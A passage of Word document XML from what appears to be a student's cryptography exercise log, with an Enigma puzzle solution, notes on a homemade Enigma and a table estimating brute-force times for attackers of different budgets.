            </w:r>
          </w:p>
          <w:p w14:paraId="455396D7" w14:textId="118CD246" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="3C88570C" w14:textId="64DEC4BB" w:rsidR="007A2B7C" w:rsidRDefault="007A2B7C" w:rsidP="181B8E52">
            <w:r>
              <w:t>Solution: PANOPTICON</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="735CBAB2" w14:textId="77777777" w:rsidR="007A2B7C" w:rsidRDefault="007A2B7C" w:rsidP="181B8E52"/>
          <w:p w14:paraId="73281B8C" w14:textId="63F415BB" w:rsidR="00945C5C" w:rsidRDefault="00945C5C" w:rsidP="181B8E52">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">I made a pringles enigma machine with a printout of the wires for rotors. This worked </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>pretty well</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and I was able to decode the message and write my own.</w:t>
            </w:r>
            <w:r w:rsidR="00660261">
              <w:t xml:space="preserve"> The key is to not lose the wiring.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="064EE432" w14:textId="18206493" w:rsidR="00945C5C" w:rsidRDefault="00660261" w:rsidP="181B8E52">
            <w:r w:rsidRPr="00660261">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DBF0836" wp14:editId="14AACAEC">
                  <wp:extent cx="5038980" cy="3779235"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2032740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40663" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5044409" cy="3783306"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E795C96" w14:textId="2C9CCE3A" w:rsidR="00945C5C" w:rsidRDefault="00945C5C" w:rsidP="181B8E52">
            <w:r w:rsidRPr="00945C5C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Favourite Word:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Zephyr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="199B0D42" w14:textId="2D6AE3EB" w:rsidR="004F7A69" w:rsidRDefault="004F7A69" w:rsidP="181B8E52"/>
          <w:p w14:paraId="0A165983" w14:textId="2EDB5012" w:rsidR="004F7A69" w:rsidRDefault="004F7A69" w:rsidP="181B8E52">
            <w:r w:rsidRPr="004F7A69">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rotor Positions:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 2,3,1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04541F00" w14:textId="05C11427" w:rsidR="004F7A69" w:rsidRPr="004F7A69" w:rsidRDefault="004F7A69" w:rsidP="181B8E52">
            <w:r w:rsidRPr="004F7A69">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Starting Position</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:t>JVY</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D96F62" w14:textId="27077106" w:rsidR="004F7A69" w:rsidRPr="004F7A69" w:rsidRDefault="004F7A69" w:rsidP="181B8E52">
            <w:r w:rsidRPr="004F7A69">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cipher Text:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> EORJFN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F59D759" w14:textId="44C7207D" w:rsidR="00945C5C" w:rsidRDefault="00945C5C" w:rsidP="181B8E52">
            <w:r w:rsidRPr="00945C5C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reason:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> It is the name of an RTOS that allows for one piece of embedded software to be written and can be used for many different forms of hardware including changing the very CPU it runs on.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42AD2012" w14:textId="49BE0F69" w:rsidR="004F7A69" w:rsidRDefault="004F7A69" w:rsidP="181B8E52"/>
          <w:p w14:paraId="66CA02C8" w14:textId="008B6C5D" w:rsidR="00945C5C" w:rsidRPr="00ED5F6D" w:rsidRDefault="00945C5C" w:rsidP="181B8E52"/>
          <w:p w14:paraId="736EC525" w14:textId="77A9F2C4" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="5AEE8E44" w14:textId="78DB4C54" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="5F3DBA38" w14:textId="4E6701A4" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="18D9014C" w14:textId="1A9F3528" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="1BE34A16" w14:textId="038A15B2" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="2CD28604" w14:textId="366D6F02" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="71BEB523" w14:textId="2A2874F1" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:p w14:paraId="2188A5E4" w14:textId="3E2CB08C" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="258907BA" w14:textId="11413CA9" w:rsidR="181B8E52" w:rsidRDefault="181B8E52" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA69E64" w14:textId="77777777" w:rsidR="00903D82" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2876E0D0" w14:textId="77777777" w:rsidR="00903D82" w:rsidRDefault="00903D82" w:rsidP="181B8E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19228AC3" w14:textId="505BA9E6" w:rsidR="6E78A25E" w:rsidRPr="00ED5F6D" w:rsidRDefault="73EA0038" w:rsidP="371C62D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidRPr="00ED5F6D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Estimate Attacker Power</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w14:paraId="70A4C8B6" w14:textId="77777777" w:rsidTr="181B8E52">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6500EBA0" w14:textId="440E681F" w:rsidR="181B8E52" w:rsidRPr="00ED5F6D" w:rsidRDefault="181B8E52" w:rsidP="181B8E52"/>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="9239" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>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549"/>
              <w:gridCol w:w="1122"/>
              <w:gridCol w:w="1933"/>
              <w:gridCol w:w="2055"/>
              <w:gridCol w:w="2580"/>
            </w:tblGrid>
            <w:tr w:rsidR="00903D82" w:rsidRPr="00903D82" w14:paraId="381E14DA" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="616"/>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C0EC81E"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Attacker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6E2002C2"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Budget</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5D16C0D7"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Hardware</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CF0D564"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Bits of work per 24 hours</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E373CA3"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Time to do 128 bits of work</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00903D82" w:rsidRPr="00903D82" w14:paraId="14AE6D49" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="887"/>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512CEA7"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Office Worker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6D8EC63D"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$200 (plus company provided laptop)</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9580FD1" w14:textId="733A05E7" w:rsidR="00903D82" w:rsidRPr="00903D82" w:rsidRDefault="005B73AE"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AMD </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Ryzen</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 5 5600x 6 Cores</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2638FED"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51</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2095707C" w14:textId="77777777" w:rsidR="00903D82" w:rsidRPr="00903D82" w:rsidRDefault="00903D82" w:rsidP="00903D82">
                  <w:pPr>
                    <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"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2^77 days</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2009026A" w14:textId="77777777" w:rsidR="00903D82" w:rsidRPr="00903D82" w:rsidRDefault="00903D82" w:rsidP="00903D82">
                  <w:pPr>
                    <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"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2^68 years</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00903D82" w:rsidRPr="00903D82" w14:paraId="6AE410AE" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="31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02A335A8"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Solo teenage Hacker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A4E20FB"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$10k</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0A5E6E8C" w14:textId="54170989" w:rsidR="00CA4D29" w:rsidRDefault="00903D82" w:rsidP="00CA4D29">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proofErr w:type="spellStart"/>
                  <w:r w:rsidR="00CA4D29">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Ryzen</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidR="00CA4D29">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 9/ Intel Ultra 9 + </w:t>
                  </w:r>
                  <w:r w:rsidR="006157CB">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>RTX2000</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="32542ACF" w14:textId="6040DE53" w:rsidR="00CA4D29" w:rsidRPr="00903D82" w:rsidRDefault="00CA4D29"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 </w:t>
                  </w:r>
                  <w:r w:rsidR="006157CB">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>(24 CPU Threads Used)</w:t>
                  </w:r>
                  <w:r w:rsidR="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> (5.7Ghz)</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1FB07B6" w14:textId="26E2E0DC"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426E56">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>1.181952x10^16</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663BA04" w14:textId="7BD5120C" w:rsidR="00717063" w:rsidRPr="00903D82" w:rsidRDefault="00717063" w:rsidP="00903D82">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00717063">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>2.8</w:t>
                  </w:r>
                  <w:r w:rsidR="00DC4C82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>7</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> x 10^</w:t>
                  </w:r>
                  <w:r w:rsidR="00DC4C82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>22</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> days</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="2441821B" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="31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A60CC56"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Small Organisation</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E8BD315" w14:textId="27D0E9E5"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w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>10</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00903D82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>0k</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2E8044D" w14:textId="5795B742"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Pr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>10 *(</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Ryzen</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 9/ Intel Ultra 9 + RTX2000)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="552DD6A5" w14:textId="59F9C634" w:rsidR="00EB538C" w:rsidRPr="00903D82" w:rsidRDefault="00EB538C"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 (24 CPU Threads Used) (5.7Ghz)</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5A906842" w14:textId="5563AB3F"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75256C">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>1.181952x10^17</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0FC9087" w14:textId="0D04D1F5" w:rsidR="000B00DE"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DC4C82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>2.8789</w:t>
                  </w:r>
                  <w:r w:rsidR="000B00DE">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> x 10^2</w:t>
                  </w:r>
                  <w:r w:rsidR="00DC4C82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>1</w:t>
                  </w:r>
                  <w:r w:rsidR="000B00DE">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>days</w:t>
                  </w:r>
                  <w:r w:rsidR="000B00DE" w:rsidRPr="000B00DE">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>​</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="5869EC77" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="30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0029116A"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Large Organisation</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28DCD8C" w14:textId="394D5092"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w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>2</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00903D82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>M</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3625E6E7" w14:textId="31DF404D" w:rsidR="006576AD" w:rsidRDefault="006576AD"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:2x</w:t>
                  </w:r>
                  <w:r w:rsidR="00EB538C" w:rsidRPr="00903D82">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r w:rsidRPr="006576AD">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>AMD EPYC™ 9355 Processor 32-core</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> (64 Thread)</w:t>
                  </w:r>
                  <w:r w:rsidRPr="006576AD">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 3.55GHz 256MB Cache (280W)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="55135CFC" w14:textId="412EA969" w:rsidR="00EB538C" w:rsidRPr="00903D82" w:rsidRDefault="006576AD"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I</w:t>
                  </w:r>
                  <w:r w:rsidR="003A1FD7">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">mplemented in a Server Rack </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2E311B3" w14:textId="09193209"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m:oMath>
                    <m:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      </w:rPr>
                      <m:t>3.5334144×</m:t>
                    </m:r>
                    <m:sSup>
                      <m:sSupPr>
                        <m:ctrlPr>
                          <w:rPr>
                            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                            <w:i/>
                          </w:rPr>
                        </m:ctrlPr>
                      </m:sSupPr>
                      <m:e>
                        <m:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          </w:rPr>
                          <m:t>10</m:t>
                        </m:r>
                      </m:e>
                      <m:sup>
                        <m:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          </w:rPr>
                          <m:t>17</m:t>
                        </m:r>
                      </m:sup>
                    </m:sSup>
                  </m:oMath>
                  <w:r w:rsidR="0075256C">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </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3C2AFE48" w14:textId="33353AE4" w:rsidR="008B59EF"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20629E">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>9.6304</w:t>
                  </w:r>
                  <w:r w:rsidR="008B59EF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>x 10^2</w:t>
                  </w:r>
                  <w:r w:rsidR="0020629E">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>0</w:t>
                  </w:r>
                  <w:r w:rsidR="008B59EF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> days </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00EB538C" w:rsidRPr="00903D82" w14:paraId="060A77BB" w14:textId="77777777" w:rsidTr="000B00DE">
              <w:trPr>
                <w:trHeight w:val="31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2A1890A"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Large botnet</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3A132F7B" w14:textId="212BECC0"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F042BF">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>$25M</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BA64D4A" w14:textId="38A72311"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DE490B">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">AMD </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidR="00DE490B">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Ryzen</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidR="00DE490B">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 5 5600x 6 Cores (4.7GHz)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0D115C6D" w14:textId="1B8A61C0" w:rsidR="00DE490B" w:rsidRPr="00903D82" w:rsidRDefault="00DE490B"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5 </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>Million</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> Devices</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E1373CC" w14:textId="4B35BE65"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6E5CDE" w:rsidRPr="006E5CDE">
                    <w:rPr>
                      <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Open Sans"/>
                      <w:color w:val="333333"/>
                      <w:lang w:eastAsia="en-AU"/>
                    </w:rPr>
                    <w:t>1.21824×10^22</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B4E4DC5" w14:textId="3BB21CAE" w:rsidR="00E05570"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AA46C9">
